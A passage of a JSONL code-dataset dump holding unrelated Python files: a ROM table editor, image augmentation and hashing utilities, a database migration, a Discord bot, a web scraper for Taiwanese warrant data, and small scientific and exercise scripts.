ow_tbls_addrs.append(addr)\r\n self.ow_tables_addrs.append(ptr_to_addr(addr))\r\n addr += 4\r\n\r\n for addr in ow_tbls_addrs:\r\n table_ptr_addr = addr\r\n table_addr = ptr_to_addr(addr)\r\n end_of_table = table_addr + (256 * 4)\r\n ow_data_addr = ptr_to_addr(end_of_table)\r\n frames_ptrs = ptr_to_addr(end_of_table + 4)\r\n frames_addr = ptr_to_addr(end_of_table + 8)\r\n SHOW(\"Loading Table (\"+HEX(table_addr)+\")\")\r\n\r\n # Create the Table Object\r\n ptr_tbl_obj = OWPointerTable(table_ptr_addr, table_addr,\r\n ow_data_addr, frames_ptrs, frames_addr)\r\n self.tables_list.append(ptr_tbl_obj)\r\n\r\n def custom_table_import(self, new_table, ow_data_addr, frames_ptrs, frames_addr):\r\n self.import_OW_Table(*addrs_filter(new_table, ow_data_addr, frames_ptrs, frames_addr))\r\n\r\n def clear_OW_Tables(self, ow_table_addr=TBL_0):\r\n # Clear all the table entries after the original OW Table\r\n ow_table_addr += 4\r\n for i in range(ow_table_addr, ow_table_addr + 25):\r\n rom.seek(i)\r\n rom.write_byte(0)\r\n # Clear all the entries in the tables_list\r\n # by re-initializing\r\n self.tables_list = []\r\n self.__init__()\r\n\r\n def import_OW_Table(self, new_table, ow_data_addr, frames_ptrs, frames_addr, ):\r\n # Imports a new OW Table\r\n write_addr = self.ow_tables_addr\r\n # Find ptr addr to write\r\n while is_table_ptr(write_addr):\r\n write_addr += 4\r\n\r\n write_ptr(new_table, write_addr)\r\n self.tables_list.append(OWPointerTable(write_addr, *addrs_filter(\r\n new_table, ow_data_addr, frames_ptrs, frames_addr)))\r\n\r\n def remove_table(self, i):\r\n tbl = self.tables_list[i]\r\n for ow in tbl.ow_data_ptrs:\r\n ow.remove()\r\n\r\n # Clear all of the godam data\r\n fill_with_data(tbl.frames_ptrs_addr, 256 * 8 * FRAMES_PER_OW, 0xFF)\r\n fill_with_data(tbl.ow_data_addr, 256 * 36, 0xFF)\r\n fill_with_data(tbl.table_addr, 259 * 4, 0xFF)\r\n\r\n # Move all the table ptrs to the left\r\n addr = self.ow_tables_addr + (i * 4)\r\n print(\"remove_table: about to remove: \"+HEX(addr))\r\n fill_with_data(addr, 4, 0)\r\n\r\n addr += 4\r\n while is_table_ptr(addr):\r\n print(\"remove_table: Moving left ptr: \"+HEX(addr))\r\n move_data(addr, addr - 4, 4, 0)\r\n addr += 4\r\n\r\n # Re-initialise the entire root\r\n self.reload()\r\n\r\n def tables_num(self):\r\n return len(self.tables_list)\r\n\r\n def repoint_table(self, table_ptrs_addr):\r\n # Find number of OWs\r\n SHOW(\"Determining number of OWs for Table: \"+HEX(table_ptrs_addr))\r\n ow_ptrs_addr = ptr_to_addr(table_ptrs_addr)\r\n ows_num = 0\r\n addr = ow_ptrs_addr\r\n while is_ow_data_ptr(addr) and ows_num <= 256:\r\n # Don't continue if OW is part of another Table\r\n if ows_num > 1 and addr in self.ow_tables_addrs:\r\n break\r\n ows_num += 1\r\n addr += 4\r\n print(\"Found OWs: {} | Not OW Pointer: {} | Pointing to: {}\".format(\\\r\n ows_num, HEX(addr), HEX(ptr_to_addr(addr))))\r\n\r\n # Create the new table and fix the previous ptrs\r\n SHOW(\"Searching Free Space for the New Table\")\r\n repointed_table = OWPointerTable(TBL_0, *addrs_filter(0, 0, 0, 0))\r\n write_ptr(repointed_table.table_addr, table_ptrs_addr)\r\n self.tables_list.append(repointed_table)\r\n\r\n # Find the Frames Pointers for each OW\r\n original_frames_ptrs = []\r\n for ow_ptr in range(ow_ptrs_addr, ow_ptrs_addr + (4 * ows_num), 4):\r\n data_ptr = ptr_to_addr(ow_ptr)\r\n original_frames_ptrs.append(ptr_to_addr(data_ptr + 0x1C))\r\n FRAMES_PTRS_PTRS.add(ptr_to_addr(data_ptr + 0x1C))\r\n\r\n # Create a list with the num of frames for each OW\r\n frames = []\r\n for ow in range(ows_num):\r\n check_addr = original_frames_ptrs[ow] + 8\r\n frames_num = 1\r\n\r\n # Check if current has different palette with the next one\r\n basic_cond = (check_addr not in FRAMES_PTRS_PTRS) and is_frames_ptr(check_addr)\r\n size_cond = read_word(check_addr + 0x4) == read_word(check_addr - 0x8 + 0x4)\r\n\r\n while basic_cond and size_cond:\r\n frames_num += 1\r\n check_addr += 8\r\n basic_cond = (check_addr not in original_frames_ptrs) and is_frames_ptr(check_addr)\r\n size_cond = read_word(check_addr + 0x4) == read_word(check_addr - 0x8 + 0x4)\r\n\r\n frames.append(frames_num)\r\n\r\n # Find the Type of each OW\r\n types = []\r\n for frames_ptrs_addr in original_frames_ptrs:\r\n FramesAssistant = FramesPointers(frames_ptrs_addr)\r\n types.append(FramesAssistant.get_type())\r\n\r\n # Restore the Data\r\n for i in range(0, ows_num):\r\n # print(\"root: Adding OW: \" + str(i))\r\n # print(\"root: Frames: \" + str(frames[i]))\r\n # print(\"OW Data Pointer: \"+HEX(ow_ptrs_addr+4*i))\r\n # print(\"Type: \"+str(types[i]))\r\n SHOW(\"Repoining OW {}\".format(i))\r\n # ow_addr = ow_ptrs_addr + i*4\r\n # data_addr = ptr_to_addr(ow_addr)\r\n # print(\"Repointing OW \"+str(i))\r\n # print(\"Data Addr: \"+HEX(data_addr))\r\n repointed_table.add_ow(types[i], frames[i])\r\n new_frames_ptr = read_word(repointed_table.ow_data_ptrs[-1].ow_data_addr + 0x1C)\r\n copy_data(ptr_to_addr(ow_ptrs_addr + i * 4),\r\n repointed_table.ow_data_ptrs[-1].ow_data_addr,\r\n 0x24)\r\n write_word(repointed_table.ow_data_ptrs[-1].ow_data_addr + 0x1C, new_frames_ptr)\r\n\r\n # Copy the actual frames\r\n for j in range(frames[i]):\r\n copy_data(ptr_to_addr(original_frames_ptrs[i] + (j * 8)),\r\n repointed_table.ow_data_ptrs[-1].frames.frames_addr + (j * get_frame_size(types[i])),\r\n get_frame_size(types[i]))\r\n\r\n if len(frames) >= 218:\r\n SHOW(\"Paddding the extra OWs\")\r\n for i in range(0, 256 - len(frames)):\r\n repointed_table.add_ow(1, 9)\r\n\r\n # Clean the data of the original table\r\n SHOW(\"Cleaning up...\")\r\n i = 0\r\n for ow_ptr in range(ow_ptrs_addr, ow_ptrs_addr + (4 * ows_num), 4):\r\n\r\n data_ptr = ptr_to_addr(ow_ptr)\r\n fill_with_data(ow_ptr, 4, 0xFF)\r\n\r\n ow_frames_ptrs = ptr_to_addr(data_ptr + 28)\r\n fill_with_data(data_ptr, 36, 0xFF)\r\n\r\n for k in range(0, frames[i]):\r\n if ow_frames_ptrs != 0xFFFFFF:\r\n if is_frames_ptr(ow_frames_ptrs) == 1:\r\n frame_addr = ptr_to_addr(ow_frames_ptrs)\r\n fill_with_data(frame_addr, get_frame_size(types[i]), 0xFF)\r\n\r\n fill_with_data(ow_frames_ptrs, 8, 0xFF)\r\n ow_frames_ptrs += 8\r\n\r\n i += 1\r\n\r\n def get_num_of_available_table_ptrs(self):\r\n\r\n check_addr = self.ow_tables_addr\r\n\r\n while is_ptr(check_addr) == 1:\r\n check_addr += 4\r\n\r\n i = 0\r\n done = 0\r\n while done == 0:\r\n adder = 0\r\n rom.seek(check_addr)\r\n for j in range(0, 4):\r\n adder += rom.read_byte()\r\n\r\n if adder != 0:\r\n done = 1\r\n else:\r\n check_addr += 4\r\n i += 1\r\n return i\r\n","sub_path":"core_files/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":32728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"271377534","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 27 17:52:30 2018\r\n\r\n@author: Pierre Lavigne\r\n\"\"\"\r\n\r\n#%%\r\n\r\nimport csv\r\nfrom skimage.transform import resize\r\nfrom skimage import exposure\r\nfrom skimage.transform import rotate\r\nfrom skimage.transform import warp\r\nfrom skimage.transform import ProjectiveTransform\r\nimport pickle\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\ndef readTrafficSigns(rootpath):\r\n '''Reads traffic sign data for German Traffic Sign Recognition Benchmark.\r\n Arguments: path to the traffic sign data, for example './GTSRB/Training'\r\n Returns: list of images, list of corresponding labels'''\r\n images = [] # images\r\n labels = [] # corresponding labels\r\n # loop over all 42 classes\r\n for c in range(0,43):\r\n prefix = rootpath + '/' + format(c, '05d') + '/' # subdirectory for class\r\n gtFile = open(prefix + 'GT-'+ format(c, '05d') + '.csv') # annotations file\r\n gtReader = csv.reader(gtFile, delimiter=';') # csv parser for annotations file\r\n next(gtReader) # skip header\r\n # loop over all images in current annotations file\r\n for row in gtReader:\r\n images.append(plt.imread(prefix + row[0])) # the 1th column is the filename\r\n labels.append(row[7]) # the 8th column is the label\r\n gtFile.close()\r\n return(images, labels)\r\n\r\n\r\ndef resize_sign(image, new_dim):\r\n return(resize(image, new_dim, mode='constant'))\r\n\r\ndef load_pickled_data(file, columns):\r\n with open(file, mode='rb') as f:\r\n dataset = pickle.load(f)\r\n return tuple(map(lambda c: dataset[c], columns))\r\n\r\ndef preprocess_dataset(X):\r\n #Convert to grayscale, e.g. single Y channel\r\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\r\n #Scale features to be in [0, 1]\r\n X = (X / 255.).astype(np.float32)\r\n\r\n # Add a single grayscale channel\r\n X = X.reshape(X.shape + (1,)) \r\n return X\r\n\r\ndef flip_extend(X, y):\r\n # Classes of signs that, when flipped horizontally, should still be classified as the same class\r\n self_flippable_horizontally = np.array([11, 12, 13, 15, 17, 18, 22, 26, 30, 35])\r\n # Classes of signs that, when flipped vertically, should still be classified as the same class\r\n self_flippable_vertically = np.array([1, 5, 12, 15, 17])\r\n # Classes of signs that, when flipped horizontally and then vertically, should still be classified as the same class\r\n self_flippable_both = np.array([32, 40])\r\n # Classes of signs that, when flipped horizontally, would still be meaningful, but should be classified as some other class\r\n cross_flippable = np.array([\r\n [19, 20], \r\n [33, 34], \r\n [36, 37], \r\n [38, 39],\r\n [20, 19], \r\n [34, 33], \r\n [37, 36], \r\n [39, 38], \r\n ])\r\n num_classes = 43\r\n \r\n X_extended = np.empty([0, X.shape[1], X.shape[2], X.shape[3]], dtype = X.dtype)\r\n y_extended = np.empty([0], dtype = y.dtype)\r\n \r\n for c in range(num_classes):\r\n # First copy existing data for this class\r\n X_extended = np.append(X_extended, X[y == c], axis = 0)\r\n # If we can flip images of this class horizontally and they would still belong to said class...\r\n if c in self_flippable_horizontally:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X[y == c][:, :, ::-1, :], axis = 0)\r\n # If we can flip images of this class horizontally and they would belong to other class...\r\n if c in cross_flippable[:, 0]:\r\n # ...Copy flipped images of that other class to the extended array.\r\n flip_class = cross_flippable[cross_flippable[:, 0] == c][0][1]\r\n X_extended = np.append(X_extended, X[y == flip_class][:, :, ::-1, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n # If we can flip images of this class vertically and they would still belong to said class...\r\n if c in self_flippable_vertically:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X_extended[y_extended == c][:, ::-1, :, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n # If we can flip images of this class horizontally AND vertically and they would still belong to said class...\r\n if c in self_flippable_both:\r\n # ...Copy their flipped versions into extended array.\r\n X_extended = np.append(X_extended, X_extended[y_extended == c][:, ::-1, ::-1, :], axis = 0)\r\n # Fill labels for added images set to current class.\r\n y_extended = np.append(y_extended, np.full((X_extended.shape[0] - y_extended.shape[0]), c, dtype = int))\r\n \r\n return (X_extended, y_extended)\r\n\r\ndef preprocess_dataset_new(X):\r\n #Convert to grayscale, e.g. single Y channel\r\n X = 0.299 * X[:, :, :, 0] + 0.587 * X[:, :, :, 1] + 0.114 * X[:, :, :, 2]\r\n #Scale features to be in [0, 1]\r\n X = (X / 255.).astype(np.float32)\r\n \r\n # Apply localized histogram localization \r\n for i in range(X.shape[0]):\r\n X[i] = exposure.equalize_adapthist(X[i])\r\n X = X.reshape(X.shape + (1,)) \r\n return X\r\n\r\n\r\ndef increase_data(images,nb_int,labels=None):\r\n image_size = images[0].shape[0]\r\n data_size = images.shape[0]\r\n for i in range(data_size):\r\n for j in range(nb_int):\r\n delta = random.uniform(-20,20) # scale using augmentation intensity\r\n d = random.uniform(-10,10)\r\n tl_top = random.uniform(-d, d) # Top left corner, top margin\r\n tl_left = random.uniform(-d, d) # Top left corner, left margin\r\n bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin\r\n bl_left = random.uniform(-d, d) # Bottom left corner, left margin\r\n tr_top = random.uniform(-d, d) # Top right corner, top margin\r\n tr_right = random.uniform(-d, d) # Top right corner, right margin\r\n br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin\r\n br_right = random.uniform(-d, d) # Bottom right corner, right margin\r\n transform = ProjectiveTransform()\r\n transform.estimate(np.array(((tl_left, tl_top),(bl_left, image_size - bl_bottom),(image_size - br_right, image_size - br_bottom),\r\n (image_size - tr_right, tr_top))), np.array(((0, 0),(0, image_size),(image_size, image_size),(image_size, 0))))\r\n \r\n images = np.append(images,[warp(images[i],transform,output_shape = (32,32),order = 1, mode='edge')],axis = 0)\r\n images = np.append(images,[rotate(images[i], random.uniform(-delta, delta), mode = 'edge')],axis=0)\r\n if labels is None:\r\n pass\r\n else:\r\n #labels = np.append(labels,labels[i])\r\n labels = np.append(labels,labels[i])\r\n if i%100 == 0:\r\n print(i/data_size*100,'% de progression')\r\n return(images,labels)\r\n\r\ndef sqr_noise(img,x,y,nb_sqr):\r\n im = []\r\n for k in range(len(img)):\r\n img2 = img[k].copy()\r\n randomsqrx = np.random.randint(x[0] ,x[1] ,nb_sqr)\r\n randomsqry = np.random.randint(y[0] ,y[1] ,nb_sqr)\r\n randomsqr = [randomsqrx,randomsqry] \r\n for (i,j) in zip(randomsqr[0],randomsqr[1]) :\r\n size = np.random.randint(2,8,2)\r\n if (np.random.randint(0,10)<5):\r\n img2[i-size[0]+5:i+5,j+5-size[1]:j+5,:] = np.zeros(size[0]*size[1]*3).reshape(size[0],size[1],3)\r\n else:\r\n img2[i+5-size[0]:i+5,j+5-size[1]:j+5,:] = np.zeros(size[0]*size[1]*3).reshape(size[0],size[1],3) + 255\r\n im.append(img2)\r\n return np.array(im)\r\n\r\n\r\n","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174623409","text":"\"\"\"empty message\n\nRevision ID: 1e730a1b145\nRevises: 18d5afb529a\nCreate Date: 2015-12-21 15:53:38.211599\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1e730a1b145'\ndown_revision = '18d5afb529a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('team',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('created_by_id', sa.Integer(), nullable=True),\n sa.Column('private', sa.Boolean(), nullable=True),\n sa.Column('avatar_url', sa.String(length=100), nullable=True),\n sa.Column('website', sa.String(length=200), nullable=True),\n sa.Column('last_updated', sa.DateTime(), nullable=True),\n sa.Column('location', sa.String(length=120), nullable=True),\n sa.Column('description', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['created_by_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_team_name'), 'team', ['name'], unique=True)\n op.create_table('projects_teams',\n sa.Column('project_id', sa.Integer(), nullable=False),\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('project_id', 'team_id')\n )\n op.create_table('team_groups',\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.Column('group_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['group_id'], ['group.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('team_id', 'group_id')\n )\n op.create_table('team_member',\n sa.Column('team_id', sa.Integer(), nullable=False),\n sa.Column('member_id', sa.Integer(), nullable=False),\n sa.Column('status', sa.String(length=50), nullable=False),\n sa.ForeignKeyConstraint(['member_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['team_id'], ['team.id'], ),\n sa.PrimaryKeyConstraint('team_id', 'member_id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('team_member')\n op.drop_table('team_groups')\n op.drop_table('projects_teams')\n op.drop_index(op.f('ix_team_name'), table_name='team')\n op.drop_table('team')\n ### end Alembic commands ###\n","sub_path":"hubserver/migrations/versions/1e730a1b145_.py","file_name":"1e730a1b145_.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111094711","text":"import cv2 as cv\nimport numpy as np\n\n# 均值哈希算法\ndef ahash(img):\n # 将图片缩放成8*8\n img = cv.resize(img, (8, 8), interpolation=cv.INTER_CUBIC)\n # 将图片转换为灰度图\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # x为像素的最初值,\n x = 0\n # hash_str的最初值为‘’\n hash_str = ''\n # 遍历累加求像素和\n for i in range(8):\n for j in range(8):\n x = x + gray[i, j]\n # 求平均速度\n avy = x / 64\n # 灰度值大于平均值就为1,小于就为0\n for i in range(8):\n for j in range(8):\n if gray[i, j] > avy:\n hash_str = hash_str + '1'\n else:\n hash_str = hash_str + '0'\n return hash_str\n\n# 差值感知算法\ndef dhash(img):\n # 将图片缩放成8*9\n img = cv.resize(img, (9, 8), interpolation=cv.INTER_CUBIC)\n # 将图片转换成灰度图\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n hash_str = ''\n # 每行前一个像素大于后一个像素就为1, 反之就为0\n for i in range(8):\n for j in range(8):\n if gray[i, j] > gray[i, j + 1]:\n hash_str = hash_str + '1'\n else:\n hash_str = hash_str + '0'\n return hash_str\n\n# 哈希值对比\ndef cmphash(hash1, hash2):\n n = 0\n # 哈希长度不一样就返回-1,表示参数出错\n if len(hash1) != len(hash2):\n return -1\n # 遍历判断\n for i in range(len(hash1)):\n # 不相等则n计数加1,n为最终的相似度\n if hash1[i] != hash2[i]:\n n = n+1\n return n\n\nimg1 = cv.imread('C:/Users/AI/Pictures/Saved Pictures/A/20210222_080517.jpg')\nimg2 = cv.imread('C:/Users/AI/Pictures/Saved Pictures/A/20210222_080653.jpg')\nhash1 = ahash(img1)\nhash2 = ahash(img2)\nprint(hash1)\nprint(hash2)\nn = cmphash(hash1, hash2)\nprint('均值哈希算法的相似度:', n)\nhash1 = dhash(img1)\nhash2 = dhash(img2)\nprint(hash1)\nprint(hash2)\nn = cmphash(hash1, hash2)\nprint('插值算法的相似度:', n)\n","sub_path":"Homework/76+彭长江+四川/哈希算法.py","file_name":"哈希算法.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111251555","text":"import argparse\n\nimport discord\nimport asyncio\n\nimport settings\nimport traceback\n\nfrom fortitude_bot import FortitudeBot\n\nclient = discord.Client()\nbot = FortitudeBot(client)\n\n\n@client.event\nasync def on_ready():\n settings.logger.info('logged in as {} '.format(client.user.name, client.user.id))\n\n\n@client.event\nasync def on_member_join(member):\n try:\n await bot._event_on_member_join(member)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\n@client.event\nasync def on_message_edit(before, after):\n try:\n await bot._event_on_message(after)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\n@client.event\nasync def on_message(context):\n try:\n await bot._event_on_message(context)\n except Exception:\n settings.logger.warning(traceback.format_exc())\n\n\ndef main():\n\n loop = asyncio.get_event_loop()\n\n try:\n token = open('token.txt', 'r').read()\n loop.run_until_complete(client.login(token))\n loop.run_until_complete(client.connect())\n except Exception:\n settings.logger.warning(traceback.format_exc())\n finally:\n settings.logger.info(\"disconnected\")\n loop.run_until_complete(client.close())\n loop.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"253339207","text":"\n# palindrome permutation\n\n# given a string\n# is a permutation of the stirng a palindrome?\n\n# tact coa\n# return true because it can be\n# tacocat or atcocta\n\n\ndef palindrome_permutation(string):\n string = string.replace(\" \", \"\")\n string = list(string)\n print(string)\n res = False\n res = recurse(res, string, 0)\n return res\n\n\ndef recurse(res, string, i):\n if i == len(string) - 1:\n temp = ''.join(string)\n print(temp == temp[::-1])\n if temp == temp[::-1]:\n res = True\n return res\n else:\n for j in range(i, len(string)):\n swap(i, j, string)\n res = recurse(res, string, i + 1)\n swap(i, j, string)\n return res\n\ndef swap(i, j, string):\n string[i], string[j] = string[j], string[i]\n\n\nprint(palindrome_permutation(\"tact coa\"))\n","sub_path":"ctci/array_strings/palindrome_permutation.py","file_name":"palindrome_permutation.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"213633616","text":"#!/usr/bin/env cctbx.python\n\nfrom cctbx.french_wilson import fw_centric,fw_acentric\nimport pandas as pd\nimport numpy as np\n\noutFN = \"fw_test_data.csv\"\n\nImin,Imax,Istep = -3, 10, 1.0\nSigImin,SigImax,SigIstep = 0.1, 10, 1.0\nSigmamin,Sigmamax,Sigmastep = 0.1, 10., 1.0\n\nI,SigI,Sigma = np.mgrid[Imin:Imax:Istep,SigImin:SigImax:SigIstep,Sigmamin:Sigmamax:Sigmastep].reshape((3, -1))\n\ndata = []\nfor args in zip(I, SigI, Sigma):\n i,sigi,sigma = args\n result = fw_acentric(i, sigi, sigma, -4.)\n if result != (-1., -1., -1., -1.): #These were rejected\n data.append(args + result)\n\ndata = np.vstack(data)\ndf = pd.DataFrame(data = data, columns=('I', 'SigI', 'Sigma', 'FW-I', 'FW-SigI', 'FW-F', 'FW-SigF'))\ndf['CENTRIC'] = False\n\ndata = []\nfor args in zip(I, SigI, Sigma):\n i,sigi,sigma = args\n result = fw_centric(i, sigi, sigma, -4.)\n if result != (-1., -1., -1., -1.): #These were rejected\n data.append(args + result)\n\ndata = np.vstack(data)\n_df = pd.DataFrame(data = data, columns=('I', 'SigI', 'Sigma', 'FW-I', 'FW-SigI', 'FW-F', 'FW-SigF'))\n_df['CENTRIC'] = True\ndf = df.append(_df)\n\ndf.to_csv(outFN, index=False)\n\n","sub_path":"tests/data/french_wilson/gen_fw_reference_data.py","file_name":"gen_fw_reference_data.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27770369","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport typing as tp\nfrom . import core\nfrom . import container\nfrom . import choice\n\n\ndef flatten_parameter(\n parameter: core.Parameter,\n with_containers: bool = True,\n order: int = 0\n) -> tp.Dict[str, core.Parameter]:\n \"\"\"List all the instances involved as parameter (not as subparameter/\n endogeneous parameter)\n\n Parameter\n ---------\n parameter: Parameter\n the parameter to inspect\n with_container: bool\n returns only non-container instances (aka no Dict, Tuple, Instrumentation or Constant)\n order: int\n order of model/internal parameters to extract. With 0, no model/internal parameters is\n extracted, with 1, only 1st order are extracted, with 2, so model/internal parameters and\n their own model/internal parameters etc...\n\n Returns\n -------\n dict\n a dict of all parameters implied in this parameter, i.e all choices, items of dict\n and tuples etc, but not the subparameters/endogeneous parameters like sigma\n with keys if type \".\" for a tuple containing dicts containing data for instance.\n\n Note\n ----\n This function is experimental, its output will probably evolve before converging.\n \"\"\"\n flat = {\"\": parameter}\n if isinstance(parameter, core.Dict):\n content_to_add: tp.List[core.Dict] = [parameter]\n if isinstance(parameter, container.Instrumentation): # special case: skip internal Tuple and Dict\n content_to_add = [parameter[0], parameter[1]] # type: ignore\n for c in content_to_add:\n for k, p in c._content.items():\n content = flatten_parameter(p, with_containers=with_containers, order=order)\n flat.update({str(k) + (\"\" if not x else (\".\" if not x.startswith(\"#\") else \"\") + x): y for x, y in content.items()})\n if order > 0 and parameter._parameters is not None:\n subparams = flatten_parameter(parameter.parameters, with_containers=False, order=order - 1)\n flat.update({\"#\" + str(x): y for x, y in subparams.items()})\n if not with_containers:\n flat = {x: y for x, y in flat.items() if not isinstance(y, (core.Dict, core.Constant)) or isinstance(y, choice.BaseChoice)}\n return flat\n","sub_path":"nevergrad/parametrization/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305969182","text":"import http.client\nimport json\n\n\ndef parse_events_from_http(stream):\n conn = http.client.HTTPSConnection(\"playing-with-projections.herokuapp.com\")\n conn.request(\"GET\", \"/stream/\" + stream)\n\n data = conn.getresponse().read().decode(\"utf-8\")\n\n events = json.loads(data)\n return events\n\ndef parse_events_from_file(stream):\n with open(\"../data/\" + stream + \".json\") as json_file:\n events = json.load(json_file)\n\n return events\n\n\nevents = parse_events_from_file(\"2\")\nall_types = [e[\"type\"] for e in events]\nprint(all_types)\n","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621651094","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport scrapy\nfrom scrapy import Selector\nfrom scrapy.loader import ItemLoader\nfrom itemloaders.processors import MapCompose, TakeFirst\nfrom exchanges.twse.items import WarrantInfoItem\n\n\nclass WarrantInfoSpider(scrapy.Spider):\n name = 'twse_warrant_info'\n allowed_domains = ['isin.twse.com.tw']\n date = datetime.date.today().strftime(\"%Y%m%d\")\n\n def start_requests(self):\n self.logger.info(f'Parsing date: {self.date}')\n yield scrapy.FormRequest(url='https://mops.twse.com.tw/mops/web/ajax_t90sbfa01', formdata={\n 'encodeURIComponent': '1', 'step': '1', 'ver': '1.9', 'TYPEK': '', 'market': '1',\n 'wrn_class': 'all', 'stock_no': '', 'wrn_no': '', 'co_id': 'all', 'wrn_type': 'all',\n 'left_month': 'all', 'return_rate': 'all', 'price_down': '', 'price_up': '',\n 'price_inout': 'all', 'newprice_down': '', 'newprice_up': '', 'fin_down': '', 'fin_up': '', 'sort': '1'\n }, callback=self.parse)\n\n def parse(self, response):\n self.logger.info('%s', response.url)\n fields = WarrantInfoItem.Meta.fields\n rows = response.xpath('//tr[count(td)=21]').extract()\n for row in rows:\n loader = ItemLoader(item=WarrantInfoItem(), selector=Selector(text=row))\n loader.default_input_processor = MapCompose(str, str.strip)\n loader.default_output_processor = TakeFirst()\n loader.add_value('date', self.date)\n for idx, field in enumerate(fields, start=1):\n if field:\n loader.add_xpath(field, f'//td[{idx}]/text()')\n yield loader.load_item()\n","sub_path":"exchanges/twse/spiders/warrant/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"472397983","text":"# MIT License\n# \n# Copyright (c) 2020-2021 Pierre-Yves Taunay \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n'''\nFile: pi_to_pi.py\nAuthor: Pierre-Yves Taunay\nDate: July 2020\n\nPlot the pi products for the total pressure against one-another\n'''\n\nimport matplotlib.pyplot as plt\n\ndef plot_pi_to_pi(data):\n fig, ax = plt.subplots(7,7)\n \n # For each pi product...\n for idxi in range(7):\n PIi_str = 'PI' + str(idxi+1)\n \n for idxj in range(7):\n if idxj >= idxi:\n PIj_str = 'PI' + str(idxj+1)\n \n ax[idxi][idxj].plot(data[[PIj_str]],data[[PIi_str]],'ko')\n\n ax[0,0].set_ylabel(\"Pi1\")\n ax[1,0].set_ylabel(\"Pi2\")\n ax[2,0].set_ylabel(\"Pi3\")\n 